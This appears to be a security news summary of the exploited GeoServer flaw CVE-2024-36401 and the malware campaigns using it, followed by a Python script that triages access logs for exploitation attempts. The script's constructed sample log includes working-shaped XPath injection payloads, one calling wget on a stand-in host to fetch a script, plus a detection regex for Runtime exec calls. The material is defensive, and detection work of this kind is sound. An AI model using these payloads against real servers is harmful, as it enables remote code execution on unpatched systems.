September 6, 2024 at 11:45AM
A critical security flaw (CVE-2024-36401, CVSS 9.8) in the OSGeo GeoTools library used by GeoServer has been exploited in campaigns distributing cryptocurrency miners, botnet malware, and the SideWalk backdoor. The attacks target IT service providers in India, U.S. technology companies, Belgian government entities, and telecom companies in Thailand and Brazil. CISA has added the flaw to its Known Exploited Vulnerabilities catalog and Fortinet FortiGuard Labs has reported on the campaigns, underlining their global reach.
Key Takeaways:
– There is a critical vulnerability in GeoServer (CVE-2024-36401, CVSS score: 9.8) rooted in the GeoTools library it depends on: property and attribute names supplied in OGC requests are evaluated as XPath expressions through the commons-jxpath library, which lets an unauthenticated attacker execute arbitrary code. It has been actively exploited to deliver cryptocurrency miners, botnet malware, and a backdoor called SideWalk. Fixes shipped in GeoServer 2.23.6, 2.24.4, and 2.25.2.
– The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog due to evidence of active exploitation.
– The attacks are targeting IT service providers in India, technology companies in the U.S., government entities in Belgium, and telecommunications companies in Thailand and Brazil.
– Exploitation has been observed to deliver GOREVERSE, a reverse proxy that connects back to a command-and-control (C2) server for post-exploitation activity.
– The exploit has also been used to distribute the Condi and JenX botnets (the latter a Mirai variant) and at least four types of cryptocurrency miners, one of which was retrieved from a fake website impersonating the Institute of Chartered Accountants of India (ICAI).
– A notable attack chain leveraging the flaw is associated with a Chinese threat actor tracked as APT41, which propagates an advanced Linux backdoor called SideWalk.
– The targets span South America (Brazil), Europe (Belgium), and Asia (India, Thailand), indicating a geographically broad campaign that is not confined to a single region or industry.
This summary provides an overview of the security vulnerability in OSGeo GeoServer GeoTools and its exploitation for delivering various types of malware and cryptocurrency miners, as well as the specific industry and geographic targets of the attacks.
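As a practical check for the exploitation described above, the following is an added example, not code from the original article, Fortinet, or CISA. It triages web server access-log lines for CVE-2024-36401 exploitation attempts against GeoServer. It assumes combined-format logs and GeoServer served under /geoserver; the sample log lines, IP addresses and the indicator regex are constructed for illustration, keyed on the payload shape that public exploitation of this flaw uses (java.lang.Runtime calls injected as XPath expressions into OGC request parameters).

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format). Not real traffic;
# the addresses are documentation ranges (RFC 5737).
SAMPLE_LOG = """\
203.0.113.7 - - [06/Sep/2024:11:45:01 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'wget%20http://198.51.100.9/x.sh') HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.22 - - [06/Sep/2024:11:46:10 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=the_geom HTTP/1.1" 200 2048 "-" "QGIS/3.34"
203.0.113.7 - - [06/Sep/2024:11:47:33 +0000] "POST /geoserver/wfs HTTP/1.1" 200 300 "-" "curl/8.4.0"
192.0.2.5 - - [06/Sep/2024:11:48:02 +0000] "GET /geoserver/wms?service=WMS&request=GetMap&layers=sf:roads&CQL_FILTER=exec(java.lang.Runtime.getRuntime(),'id')%3D1 HTTP/1.1" 400 120 "-" "Mozilla/5.0"
192.0.2.9 - - [06/Sep/2024:11:49:00 +0000] "GET /index.html HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""

# Combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# GeoServer OGC endpoints, with or without a workspace prefix
# (/geoserver/wfs, /geoserver/sf/wms, ...). Assumed deployment path.
GEOSERVER_PATH_RE = re.compile(r'^/geoserver/(?:[^/?]+/)?(?:wfs|wms|wps|ows)\b', re.I)

# Illustrative heuristic for JXPath code-execution payloads, not a vendor
# signature: these tokens have no business appearing in OGC parameters.
INDICATOR_RE = re.compile(
    r'java\.lang\.|getRuntime\s*\(|exec\s*\(|ProcessBuilder|javax\.script', re.I
)


def decode_target(target):
    """URL-decode repeatedly (bounded) so double-encoded payloads are seen."""
    prev, cur = None, target
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote_plus(cur)
    return cur


def triage_line(line):
    """Classify one access-log line.

    Returns None for lines that are not GeoServer OGC requests, otherwise a
    dict with the client, timestamp, method, status, a verdict and the
    matched evidence.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m.group("target"))
    path, _, query = target.partition("?")
    if not GEOSERVER_PATH_RE.match(path):
        return None

    hit = INDICATOR_RE.search(query)
    if hit:
        verdict = "exploit_attempt"
        evidence = query[max(0, hit.start() - 20): hit.end() + 40]
    elif m.group("method") == "POST":
        # Access logs do not record request bodies. The same XPath payload can
        # be carried inside a POSTed XML filter, so a POST to an OGC endpoint
        # cannot be cleared from the access log alone.
        verdict = "needs_body_inspection"
        evidence = ""
    else:
        verdict = "benign"
        evidence = ""
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "status": m.group("status"),
        "verdict": verdict,
        "evidence": evidence,
    }


def triage_log(text):
    """Run triage over a whole log, dropping non-GeoServer lines."""
    return [r for r in (triage_line(ln) for ln in text.splitlines()) if r]


if __name__ == "__main__":
    for r in triage_log(SAMPLE_LOG):
        print(r["verdict"], r["ip"], r["method"], r["status"], r["evidence"])
```

A 200 on a flagged request is the one to escalate first: a 400 may mean the payload was rejected, but a successful GetPropertyValue or GetMap carrying a Runtime call is strong evidence of execution on an unpatched instance. Treat the POST verdict as a gap to close with a WAF or reverse-proxy body log rather than as a clean result, and pair this triage with confirming that the instance runs GeoServer 2.23.6, 2.24.4, 2.25.2 or later.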